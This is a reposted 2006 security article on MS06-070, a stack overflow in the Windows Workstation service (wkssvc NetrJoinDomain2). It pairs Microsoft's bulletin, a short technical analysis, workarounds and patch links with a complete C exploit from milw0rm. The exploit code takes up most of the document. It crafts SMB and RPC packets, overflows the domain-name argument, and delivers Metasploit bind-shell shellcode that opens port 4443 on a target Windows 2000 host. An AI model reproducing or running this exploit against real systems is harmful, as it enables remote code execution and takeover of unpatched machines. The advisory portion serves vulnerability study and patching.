MS06-070 Vulnerability Exploit Code

Author: RHU-TAC editor   Source: collected by RHU from the web   Date: 2006-11-23




Microsoft Security Bulletin MS06-070
Vulnerability in Workstation Service Could Allow Remote Code Execution (924270)
Published: November 14, 2006

Version: 1.0

Summary
Who should read this document: Customers who use Microsoft Windows

Impact of vulnerability: Remote code execution

Maximum severity rating: Critical

Recommendation: Customers should apply the update immediately

Tested software and security update download locations:

Affected software:

• Microsoft Windows 2000 Service Pack 4 (download the update)

• Microsoft Windows XP Service Pack 2 (download the update)


Non-affected software:

• Microsoft Windows XP Professional x64 Edition

• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1

• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 SP1 for Itanium-based Systems

• Microsoft Windows Server 2003 x64 Edition


BUGTRAQ ID: 20985
CVE(CAN) ID: CVE-2006-4691

Microsoft Windows is Microsoft's widely deployed operating system.

A stack overflow vulnerability exists in the Workstation service component of Windows. A remote attacker could exploit it to execute arbitrary instructions on the server.

In the Workstation service module wkssvc.dll, the NetpManageIPCConnect function calls swprintf with unchecked buffer data, and that input buffer is controllable by a remote attacker.

.text:76781D67 mov edi, [ebp+arg_0]
...
.text:76781D90 lea eax, [ebp+var_2CC]
...
.text:76781DA0 push edi
.text:76781DA1 push offset "%ws\IPC$"
.text:76781DA6 push eax
.text:76781DA7 call ds:swprintf

NetpJoinDomain calls this function, and NetpJoinDomain is in turn reached from NetrJoinDomain2, which is exposed over RPC.

The IDL of NetrJoinDomain2 is roughly:

long _NetrJoinDomain2@28 (
[in][unique][string] wchar_t * arg_1,
[in][string] wchar_t * arg_2,
[in][unique][string] wchar_t * arg_3,
[in][unique][string] wchar_t * arg_4,
[in][unique] struct_C * arg_5,
[in] long arg_6
);

arg_2 holds a string of the form <Domain name> + "\" + <Hostname>.

<Hostname> is used as the first parameter of NetpManageIPCConnect. This value is attacker-controlled and is eventually passed to swprintf, which causes the stack overflow.
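The unchecked-format pattern described above, reduced to a minimal C illustration beside its bounded form. This is an added example, not code from the advisory or from the exploit below; the buffer capacity IPC_PATH_CAP and the two demo functions are constructed, and the standard %ls conversion stands in for MSVC's %ws.

```c
#include <wchar.h>

/* Constructed capacity for the destination buffer, in wide characters
 * including the terminator.  The real size of var_2CC is not given above. */
#define IPC_PATH_CAP 64

/* Hardened form of the "%ws\IPC$" construction: returns 1 and writes
 * "<host>\IPC$" into out, or returns 0 (out emptied) when the host name
 * would not fit.  The unchecked original formats with no capacity at all. */
int build_ipc_path(const wchar_t *host, wchar_t *out, size_t cap)
{
    size_t need;
    if (host == NULL || out == NULL || cap == 0)
        return 0;
    /* Bound the input before formatting: host + "\IPC$" (5 chars) + NUL. */
    need = wcslen(host) + 5 + 1;
    if (need > cap) {
        out[0] = L'\0';
        return 0;
    }
    /* C99 swprintf takes the capacity and returns a negative value if the
     * output would be truncated; MSVC's %ws is the standard %ls here. */
    if (swprintf(out, cap, L"%ls\\IPC$", host) < 0) {
        out[0] = L'\0';
        return 0;
    }
    return 1;
}

/* A short host name fits: expect 1 and the exact path. */
int demo_short_host(void)
{
    wchar_t buf[IPC_PATH_CAP];
    return build_ipc_path(L"SERVER1", buf, IPC_PATH_CAP) == 1
        && wcscmp(buf, L"SERVER1\\IPC$") == 0;
}

/* A constructed over-long host name (the attacker-controlled case) is
 * rejected before anything is written past the buffer: expect 1. */
int demo_long_host(void)
{
    wchar_t buf[IPC_PATH_CAP];
    wchar_t host[IPC_PATH_CAP + 8];
    size_t i;
    for (i = 0; i < IPC_PATH_CAP + 7; i++)
        host[i] = L'A';
    host[i] = L'\0';
    return build_ipc_path(host, buf, IPC_PATH_CAP) == 0 && buf[0] == L'\0';
}
```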

<* Source: JeongWook Matt Oh
    Derek Soeder (dsoeder@eeye.com)

Links:
http://secunia.com/advisories/22883
http://research.eeye.com/html/advisories/published/AD20061114.html
http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx
http://www.us-cert.gov/cas/techalerts/TA06-318A.html
*>

Recommendations:

Temporary workarounds:

* Block TCP ports 139 and 445 at the firewall.
* Use a personal firewall, such as the Windows Firewall bundled with Windows XP.
* Enable advanced TCP/IP filtering on systems that support it.
* Use IPSec on affected systems to block the affected ports.

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS06-070) and the corresponding patch:
MS06-070: Vulnerability in Workstation Service Could Allow Remote Code Execution (924270)
Link:
http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx

Patch download:
http://www.microsoft.com/downloads/details.aspx?FamilyId=3ad5c57d-d3f6-46a1-8dee-3e16d0977f80
http://www.microsoft.com/downloads/details.aspx?FamilyId=f4c8e767-4ed2-4e36-aa43-612f3017efc7





Exploit code:

/***************************************************************************

Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp

Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.

Greetz to InTel

Should work on Windows 2000 Server SP4 (All Languages)


usage:
ms06070 targetip DomainName

notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")


unsigned char SmbNeg[] =        //SMB Negotiate Protocol request ("NT LM 0.12")
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";


unsigned char Session_Setup_AndX_Request[]=   //anonymous (null) session setup
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";


unsigned char TreeConnect_AndX_Request[]=   //tree connect to IPC$ (path hardcoded in the original)
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";


unsigned char NTCreate_AndX_Request[]=   //open the \wkssvc named pipe
"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";


unsigned char Rpc_Bind_Wkssvc[]=   //SMB Trans + DCERPC bind to the wkssvc interface
"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";


unsigned char Rpc_NetrJoinDomain2_Header[]=   //SMB Trans + DCERPC request header for NetrJoinDomain2
"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
"\x00\x00\x00\x00"
"\x16\x00"   //opnum,NetrJoinDomain2
"\x30\x2a\x42\x00"
"\x0e\x00\x00\x00"
"\x00\x00\x00\x00"
"\x0e\x00\x00\x00"
"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
"\x00\x00"
"\x10\x01\x00\x00"   //max count of arg_2 (patched in MakeAttackPacket)
"\x00\x00\x00\x00"
"\x10\x01\x00\x00";  //actual count of arg_2 (patched in MakeAttackPacket)


unsigned char Rpc_NetrJoinDomain2_End[]=   //remaining (null) parameters of NetrJoinDomain2
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";


unsigned char *lpDomainName=NULL;
DWORD   dwDomainNameLen=0;



/* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe9"
"\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83\x01\xa0\xdc\x31"
"\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2\x5f\xcb\x91\x58\xcc\x45"
"\xa6\x41\xa8\x91\xc9\x58\xc8\x87\x62\x6d\xa8\xcf\x07\x68\xe3\x57"
"\x45\xdd\xe3\xba\xee\x98\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6"
"\x9c\xbc\xa8\x91\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25"
"\xea\x75\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
"\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57\xcf\x9e"
"\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc\xb6\x0d\xdc\x1e"
"\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0\xc6\xa8\x68\xb4\x2b\xcc"
"\xbc\x33\x21\x31\x39\x31\xfa\xc7\x1c\xf4\x74\x31\x3f\x0a\x70\x9d"
"\xba\x0a\x60\x9d\xaa\x0a\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f"
"\x7c\x31\x87\xd4\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6"
"\x4d\xf4\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
"\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f\x5a\x99"
"\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3\x60\xbc\x49\x9e"
"\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68\xe3\x3d\x43\xa7\x61\xe3"
"\x17\x1b\x0f\x5d\x64\x23\x1b\x65\x42\xf2\x4b\xbc\x17\xea\x35\x31"
"\x9c\x1d\xdc\x18\xb2\x0e\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f"
"\x16\x89\x4b\x63\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e"
"\x62\x0e\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
"\xba\xa6\xf5\x31\x39\x59\x23\xce";


DWORD   fill_len_1 =0x84c;   //fill data
DWORD   fill_len_2 =0x1000;   //fill rubbish data
DWORD   addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[]=     //jmp 8: skips over the return address that follows it
"\xEB\x06\x90\x90";

unsigned char *Rpc_NetrJoinDomain2=NULL;
DWORD   dwRpc_NetrJoinDomain2=0;


unsigned char recvbuff[2048];


void showinfo(void)
{
printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
printf("page:http://ruder.cdut.net/default.asp\n\n");
printf("Code fixed by S A Stevens - 16.11.2006\n");
printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
printf("usage:\n");
printf("ms06070 targetip DomainName\n\n");
printf("notice:\n");
printf("Make sure the DomainName is valid and live,more informations see\n");
printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");

}

void neg ( int s )
{
char response[1024];

memset(response,0,sizeof(response));

send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}



void MakeAttackPacket(char *lpDomainNameStr)
{
DWORD j,len,b_flag;



dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

memset(lpDomainName,0,dwDomainNameLen);

MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

*(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
*(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

len=dwDomainNameLen+   //DomainName
fill_len_1-3*2+     //fill_len_1
4+       //jmp 8
4+       //addr jmp ebx
sizeof(shellcode)-1+   //shellcode
fill_len_2+     //fill_len_2
2;       //0x0000

b_flag=0;
if (len%2==1)
{
len++;
b_flag=1;
}


dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
    len+
    sizeof(Rpc_NetrJoinDomain2_End)-1; //end


//malloc
Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
if (Rpc_NetrJoinDomain2==NULL)
{
printf("malloc error!\n");
return;
}

//fill nop
memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);


j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

//update para1 length
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
*(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;


//copy header

memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);

j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

//copy DomainName
memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
j=j+dwDomainNameLen;

//calculate offset
j=j+fill_len_1-3*2;

//jmp 8
memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
j=j+4;

//jmp ebx address
*(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
j=j+4;

//copy shellcode
memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
j=j+sizeof(shellcode)-1;

//fill data
memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
j=j+fill_len_2;

//0x0000(NULL)
if (b_flag==0)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
j=j+2;
}
else if (b_flag==1)
{
Rpc_NetrJoinDomain2[j]=0x00;
Rpc_NetrJoinDomain2[j+1]=0x00;
Rpc_NetrJoinDomain2[j+2]=0x00;
j=j+3;
}


//copy other parameter

memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);

j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;


}



void main(int argc,char **argv)
{
WSADATA   ws;
struct sockaddr_in server;
SOCKET   sock;
int   ret;      //connect()/send() return int; SOCKET_ERROR (-1) was lost in a DWORD
WORD   userid,treeid,fid;

if (argc<3)     //print usage instead of dereferencing a missing argv[2]
{
showinfo();
return;
}

WSAStartup(MAKEWORD(2,2),&ws);


sock = socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)   //SOCKET is unsigned, so sock<=0 never caught INVALID_SOCKET
{
return;
}

  server.sin_family = AF_INET;
  server.sin_addr.s_addr = inet_addr(argv[1]);
  server.sin_port = htons((USHORT)445);

printf("[+] Connecting %s\n",argv[1]);

  ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("Connection Error, Port 445 Firewalled?\n");
return;
}


neg(sock);

recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

userid=*(WORD *)(recvbuff+0x20);     //get userid


memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

treeid=*(WORD *)(recvbuff+0x1c);     //get treeid


//send NTCreate_AndX_Request
memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid


ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
if (ret<=0)
{
printf("send NTCreate_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


fid=*(WORD *)(recvbuff+0x2a);     //get fid


//rpc bind

memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
*(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
if (ret<=0)
{
printf("send Rpc_Bind_Wkssvc error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


MakeAttackPacket((char *)argv[2]);


memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
*(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

*(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count
*(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
*(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length

ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
if (ret<=0)
{
printf("send Rpc_NetrJoinDomain2 error!\n");
return;
}

printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);

recv(sock,(char *)recvbuff,sizeof(recvbuff),0);




closesocket(sock);

}

// milw0rm.com [2006-11-17]
 

